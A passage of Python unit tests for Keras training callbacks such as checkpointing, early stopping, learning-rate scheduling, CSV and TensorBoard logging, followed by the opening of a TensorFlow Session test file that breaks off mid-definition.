get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)] model = Sequential() for _ in range(5): model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') def data_generator(): i = 0 max_batch_index = len(X_train) // batch_size tot = 0 while 1: if tot > 3 * len(X_train): yield (np.ones([batch_size, input_dim]) * np.nan, np.ones([batch_size, num_classes]) * np.nan) else: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) i += 1 tot += 1 i = i % max_batch_index history = model.fit_generator(data_generator(), len(X_train) // batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) > 1 assert loss[-1] == np.inf or np.isnan(loss[-1]) values = [] with open(fp) as f: for x in reader(f): values.append(x) assert 'nan' in 
values[-1], 'The last epoch was not logged.' os.remove(fp) @keras_test def test_ModelCheckpoint(tmpdir): np.random.seed(1337) filepath = str(tmpdir / 'checkpoint.h5') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) # case 1 monitor = 'val_loss' save_best_only = False mode = 'auto' model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 2 mode = 'min' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 3 mode = 'max' monitor = 'val_acc' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 4 save_best_only = True cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 5 save_best_only = False period = 2 mode = 'auto' filepath = 'checkpoint.{epoch:02d}.h5' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, period=period)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=4) assert os.path.isfile(filepath.format(epoch=2)) assert os.path.isfile(filepath.format(epoch=4)) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=3)) os.remove(filepath.format(epoch=2)) os.remove(filepath.format(epoch=4)) assert not tmpdir.listdir() @keras_test def test_EarlyStopping(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) mode = 'max' monitor = 'val_acc' patience = 0 cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)] history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) mode = 'auto' monitor = 'val_acc' patience = 2 cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)] history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, 
epochs=20) @keras_test def test_EarlyStopping_reuse(): np.random.seed(1337) patience = 3 data = np.random.random((100, 1)) labels = np.where(data > 0.5, 1, 0) model = Sequential(( Dense(1, input_dim=1, activation='relu'), Dense(1, activation='sigmoid'), )) model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy']) stopper = callbacks.EarlyStopping(monitor='acc', patience=patience) weights = model.get_weights() hist = model.fit(data, labels, callbacks=[stopper], epochs=20) assert len(hist.epoch) >= patience # This should allow training to go for at least `patience` epochs model.set_weights(weights) hist = model.fit(data, labels, callbacks=[stopper], epochs=20) assert len(hist.epoch) >= patience @keras_test def test_EarlyStopping_patience(): class DummyModel(object): def __init__(self): self.stop_training = False def get_weights(self): return [] def set_weights(self, weights): pass early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2) early_stop.model = DummyModel() losses = [0.0860, 0.1096, 0.1040, 0.1019] # Should stop after epoch 3, # as the loss has not improved after patience=2 epochs. epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break assert epochs_trained == 3 @keras_test def test_EarlyStopping_baseline(): class DummyModel(object): def __init__(self): self.stop_training = False def get_weights(self): return [] def set_weights(self, weights): pass def baseline_tester(acc_levels): early_stop = callbacks.EarlyStopping(monitor='val_acc', baseline=0.75, patience=2) early_stop.model = DummyModel() epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(acc_levels)): epochs_trained += 1 early_stop.on_epoch_end(epoch, logs={'val_acc': acc_levels[epoch]}) if early_stop.model.stop_training: break return epochs_trained acc_levels = [0.55, 0.76, 0.81, 0.81] baseline_met = baseline_tester(acc_levels) acc_levels = [0.55, 0.74, 0.81, 0.81] baseline_not_met = baseline_tester(acc_levels) # All epochs should run because baseline was met in second epoch assert baseline_met == 4 # Baseline was not met by second epoch and should stop assert baseline_not_met == 2 @keras_test def test_EarlyStopping_final_weights(): class DummyModel(object): def __init__(self): self.stop_training = False self.weights = -1 def get_weights(self): return self.weights def set_weights(self, weights): self.weights = weights def set_weight_to_epoch(self, epoch): self.weights = epoch early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2) early_stop.model = DummyModel() losses = [0.2, 0.15, 0.1, 0.11, 0.12] epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.model.set_weight_to_epoch(epoch=epoch) early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break # The best configuration is in the epoch 2 (loss = 0.1000), # so with patience=2 we need to end up at epoch 4 assert early_stop.model.get_weights() == 4 @keras_test def test_EarlyStopping_final_weights_when_restoring_model_weights(): class DummyModel(object): def __init__(self): self.stop_training = False self.weights = -1 def get_weights(self): return self.weights def set_weights(self, weights): self.weights = weights def set_weight_to_epoch(self, epoch): self.weights = epoch early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2, 
restore_best_weights=True) early_stop.model = DummyModel() losses = [0.2, 0.15, 0.1, 0.11, 0.12] # The best configuration is in the epoch 2 (loss = 0.1000). epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.model.set_weight_to_epoch(epoch=epoch) early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break # The best configuration is in epoch 2 (loss = 0.1000), # and while patience = 2, we're restoring the best weights, # so we end up at the epoch with the best weights, i.e. epoch 2 assert early_stop.model.get_weights() == 2 @keras_test def test_LearningRateScheduler(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5) assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon() @keras_test def test_ReduceLROnPlateau(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=0.1), metrics=['accuracy']) return model model = make_model() # This should reduce the LR after the first epoch (due to high epsilon). 
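    # (Added note: min_delta=10 below is so large that no epoch ever counts as an improvement,
    # so the plateau logic triggers immediately and lr drops by factor=0.1 from 0.1 to 0.01;
    # the second case uses min_delta=0, where normal improvements keep lr at its initial 0.1.)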
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, min_delta=10, patience=1, cooldown=5)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2) assert_allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon()) model = make_model() cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, min_delta=0, patience=1, cooldown=5)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2) assert_allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon()) @keras_test def test_ReduceLROnPlateau_patience(): class DummyOptimizer(object): def __init__(self): self.lr = K.variable(1.0) class DummyModel(object): def __init__(self): self.optimizer = DummyOptimizer() reduce_on_plateau = callbacks.ReduceLROnPlateau(monitor='val_loss', patience=2) reduce_on_plateau.model = DummyModel() losses = [0.0860, 0.1096, 0.1040] lrs = [] for epoch in range(len(losses)): reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) lrs.append(K.get_value(reduce_on_plateau.model.optimizer.lr)) # The learning rates should be 1.0 except the last one assert all([lr == 1.0 for lr in lrs[:-1]]) and lrs[-1] < 1.0 @keras_test def test_ReduceLROnPlateau_backwards_compatibility(): import warnings with warnings.catch_warnings(record=True) as ws: reduce_on_plateau = callbacks.ReduceLROnPlateau(epsilon=1e-13) # Check if warnings are disabled if os.environ.get("PYTHONWARNINGS") != "ignore": assert "`epsilon` argument is deprecated" in str(ws[0].message) assert not hasattr(reduce_on_plateau, 'epsilon') assert hasattr(reduce_on_plateau, 'min_delta') assert reduce_on_plateau.min_delta == 1e-13 @keras_test def test_CSVLogger(tmpdir): np.random.seed(1337) filepath = str(tmpdir / 'log.tsv') sep = '\t' (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=0.1), metrics=['accuracy']) return model # case 1, create new file with defined separator model = make_model() cbks = [callbacks.CSVLogger(filepath, separator=sep)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) with open(filepath) as csvfile: dialect = Sniffer().sniff(csvfile.read()) assert dialect.delimiter == sep del model del cbks # case 2, append data to existing file, skip header model = make_model() cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) # case 3, reuse of CSVLogger object model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) import re with open(filepath) as csvfile: output = " ".join(csvfile.readlines()) assert len(re.findall('epoch', output)) == 1 os.remove(filepath) assert not tmpdir.listdir() @keras_test def test_TensorBoard(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = 
get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index class DummyStatefulMetric(Layer): def __init__(self, name='dummy_stateful_metric', **kwargs): super(DummyStatefulMetric, self).__init__(name=name, **kwargs) self.stateful = True self.state = K.variable(value=0, dtype='int32') def reset_states(self): pass def __call__(self, y_true, y_pred): return self.state inp = Input((input_dim,)) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=inp, outputs=output) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy', DummyStatefulMetric()]) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq, embeddings_freq=1): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=embeddings_freq, embeddings_layer_names=['dense_1'], embeddings_data=X_test, batch_size=5)] # fit without validation data model.fit(X_train, y_train, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0), epochs=3) # fit with validation data and accuracy model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=callbacks_factory(histogram_freq=0), epochs=2) # fit generator without validation data model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0)) # fit generator with validation data and accuracy model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=(X_test, y_test), callbacks=callbacks_factory(histogram_freq=1)) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='Requires TensorFlow backend') def test_TensorBoard_histogram_freq_must_have_validation_data(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index inp = Input((input_dim,)) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=inp, 
outputs=output) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq, embeddings_freq=1): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=embeddings_freq, embeddings_layer_names=['dense_1'], embeddings_data=X_test, batch_size=5)] # fit without validation data should raise ValueError if histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit(X_train, y_train, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=1), epochs=3) assert 'validation_data must be provided' in str(raised_exception.value) # fit generator without validation data should raise ValueError if # histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=1)) assert 'validation_data must be provided' in str(raised_exception.value) # fit generator with validation data generator should raise ValueError if # histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=data_generator(False), validation_steps=1, callbacks=callbacks_factory(histogram_freq=1)) assert 'validation_data must be provided' in str(raised_exception.value) @keras_test def test_TensorBoard_multi_input_output(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim, input_dim), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield ([X_train[i * batch_size: (i + 1) * batch_size]] * 2, [y_train[i * batch_size: (i + 1) * batch_size]] * 2) else: yield ([X_test[i * batch_size: (i + 1) * batch_size]] * 2, [y_test[i * batch_size: (i + 1) * batch_size]] * 2) i += 1 i = i % max_batch_index inp1 = Input((input_dim, input_dim)) inp2 = Input((input_dim, input_dim)) inp_3d = add([inp1, inp2]) inp_2d = GlobalAveragePooling1D()(inp_3d) # test a layer with a list of output tensors inp_pair = Lambda(lambda x: x)([inp_3d, inp_2d]) hidden = dot(inp_pair, axes=-1) hidden = Dense(num_hidden, activation='relu')(hidden) hidden = Dropout(0.1)(hidden) output1 = Dense(num_classes, activation='softmax')(hidden) output2 = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=[inp1, inp2], outputs=[output1, output2]) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq, embeddings_freq=1): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=embeddings_freq, embeddings_layer_names=['dense_1'], embeddings_data=[X_test] * 2, batch_size=5)] # fit without validation data model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0), epochs=3) # fit with validation data and accuracy model.fit([X_train] * 
2, [y_train] * 2, batch_size=batch_size, validation_data=([X_test] * 2, [y_test] * 2), callbacks=callbacks_factory(histogram_freq=1), epochs=2) # fit generator without validation data model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=0, embeddings_freq=0)) # fit generator with validation data and accuracy model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=([X_test] * 2, [y_test] * 2), callbacks=callbacks_factory(histogram_freq=1)) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def test_TensorBoard_convnet(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') input_shape = (16, 16, 3) (x_train, y_train), (x_test, y_test) = get_test_data(num_train=500, num_test=200, input_shape=input_shape, classification=True, num_classes=num_classes) y_train = np_utils.to_categorical(y_train) y_test = np_utils.to_categorical(y_test) model = Sequential([ Conv2D(filters=8, kernel_size=3, activation='relu', input_shape=input_shape), MaxPooling2D(pool_size=2), Conv2D(filters=4, kernel_size=(3, 3), activation='relu', padding='same'), GlobalAveragePooling2D(), Dense(num_classes, activation='softmax') ]) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1, write_images=True, write_grads=True, batch_size=16) cbks = [tsb] model.summary() history = model.fit(x_train, y_train, epochs=2, batch_size=16, validation_data=(x_test, y_test), callbacks=cbks, verbose=0) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def test_CallbackValData(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1) model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=[cbk], epochs=1) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1) model.fit_generator(data_generator(True), len(X_train), epochs=1, validation_data=(X_test, y_test), callbacks=[cbk2]) # callback validation data should always have x, y, and sample weights assert len(cbk.validation_data) == len(cbk2.validation_data) == 3 assert cbk.validation_data[0] is cbk2.validation_data[0] assert cbk.validation_data[1] is cbk2.validation_data[1] assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape @keras_test def test_LambdaCallback(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = 
np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # Start an arbitrary process that should run during model training and # be terminated after training has completed. def f(): while True: pass p = multiprocessing.Process(target=f) p.start() cleanup_callback = callbacks.LambdaCallback( on_train_end=lambda logs: p.terminate()) cbks = [cleanup_callback] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5) p.join() assert not p.is_alive() @keras_test def test_TensorBoard_with_ReduceLROnPlateau(tmpdir): import shutil np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [ callbacks.ReduceLROnPlateau( monitor='val_loss', factor=0.5, patience=4, verbose=1), callbacks.TensorBoard( log_dir=filepath)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=2) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def tests_RemoteMonitor(): (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.RemoteMonitor()] with patch('requests.post'): model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) @keras_test def tests_RemoteMonitorWithJsonPayload(): (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.RemoteMonitor(send_as_json=True)] with patch('requests.post'): model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) if __name__ == '__main__': pytest.main([__file__])
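
# --- Illustrative sketch (added; not part of the original test suite) ---
# A minimal custom callback of the kind exercised by the tests above: it records the
# training loss after every epoch. Only `callbacks.Callback` and its `on_epoch_end`
# hook are Keras API; the class name and the usage shown in the trailing comment are
# made up for illustration.
class LossHistorySketch(callbacks.Callback):
    def on_train_begin(self, logs=None):
        # reset the record at the start of every fit() call
        self.losses = []

    def on_epoch_end(self, epoch, logs=None):
        # `logs` carries the metrics computed for this epoch (loss, acc, val_loss, ...)
        self.losses.append((logs or {}).get('loss'))

# Hypothetical usage:
#   history_cb = LossHistorySketch()
#   model.fit(X_train, y_train, epochs=3, callbacks=[history_cb])
#   print(history_cb.losses)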
session_test.py
# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for tensorflow.python.client.session.Session.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import threading import time import numpy as np import six from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.core.lib.core import error_codes_pb2 from tensorflow.core.protobuf import config_pb2 from tensorflow.python.client import session from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_util from tensorflow.python.framework import test_util from tensorflow.python.framework import versions from tensorflow.python.ops import array_ops from tensorflow.python.ops import constant_op from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import state_ops from tensorflow.python.ops import variables from tensorflow.python.platform import googletest from tensorflow.python.util import compat # NOTE(mrry): Dummy shape registration for op used in the tests. ops.RegisterShape('ConstructionFails')(None) class SessionTest(test_util.TensorFlowTestCase): def testUseExistingGraph(self): with ops.Graph().as_default() as g, ops.device('/cpu:0'): a = constant_op.constant(6.0, shape=[1, 1]) b = constant_op.constant(7.0, shape=[1, 1]) c = math_ops.matmul(a, b, name='matmul') with session.Session(graph=g): result = c.eval() self.assertAllEqual(result, [[42.0]]) def testUseDefaultGraph(self): with ops.Graph().as_default(), ops.device('/cpu:0'): a = constant_op.constant(6.0, shape=[1, 1]) b = constant_op.constant(7.0, shape=[1, 1]) c = math_ops.matmul(a, b, name='matmul') with session.Session(): result = c.eval() self.assertAllEqual(result, [[42.0]]) def testCreate(self): with session.Session(): inp = constant_op.constant(10.0, shape=[2, 3], name='W1') copy = array_ops.identity(inp) # Test with feed. # TODO(mrry): Investigate why order='F' didn't work. arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C') copy_val = copy.eval({'W1:0': arr}) self.assertAllEqual(arr, copy_val) # Test without feed. copy_val = copy.eval() self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32), copy_val) def testManyCPUs(self): # TODO(keveman): Implement ListDevices and test for the number of # devices returned by ListDevices. with session.Session( config=config_pb2.ConfigProto(device_count={'CPU': 2})): inp = constant_op.constant(10.0, name='W1') self.assertAllEqual(inp.eval(), 10.0) def testPerSessionThreads(self): # TODO(keveman): Implement ListDevices and test for the number of # devices returned by ListDevices. 
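    # (Added note: use_per_session_threads gives this session its own thread pool
    # instead of sharing the process-wide pool with other sessions.)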
with session.Session( config=config_pb2.ConfigProto(use_per_session_threads=True)): inp = constant_op.constant(10.0, name='W1') self.assertAllEqual(inp.eval(), 10.0) def testErrorsReported(self): with session.Session() as s: constant_op.constant(10.0, name='W1') with self.assertRaises(ValueError): s.run('foo:0') def testErrorPayload(self): with session.Session(): a = array_ops.placeholder(dtypes.float32) with self.assertRaisesOpError(lambda e: e.op == a.op): a.eval() def testErrorCodeWithNoNodeDef(self): with session.Session() as s: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) def exc_predicate(e): return (e.op is None and e.node_def is None and e.error_code == error_codes_pb2.INVALID_ARGUMENT) with self.assertRaisesOpError(exc_predicate): # Run with a bogus handle. s.partial_run('foo', r1, feed_dict={a: 1, b: 2}) def testOpConstructionErrorPayload(self): with session.Session(): failing_op = ops.get_default_graph().create_op( 'ConstructionFails', [], [], name='f') def exc_predicate(e): return (e.op == failing_op and e.error_code == error_codes_pb2.INVALID_ARGUMENT) with self.assertRaisesOpError(exc_predicate): failing_op.run() def testErrorBasedOn(self): with session.Session() as sess: a = constant_op.constant(0.0, shape=[2, 3]) # NOTE(mrry): The original_op is nonsense, but used here to test that the # errors are reported correctly. # pylint: disable=protected-access with sess.graph._original_op(a.op): b = array_ops.identity(a, name='id') with sess.graph._original_op(b.op): c = array_ops.placeholder(dtypes.float32) # pylint: enable=protected-access def exc_predicate(e): return (e.op == c.op and e.op._original_op == b.op and e.op._original_op._original_op == a.op) with self.assertRaisesOpError(exc_predicate): c.eval() def 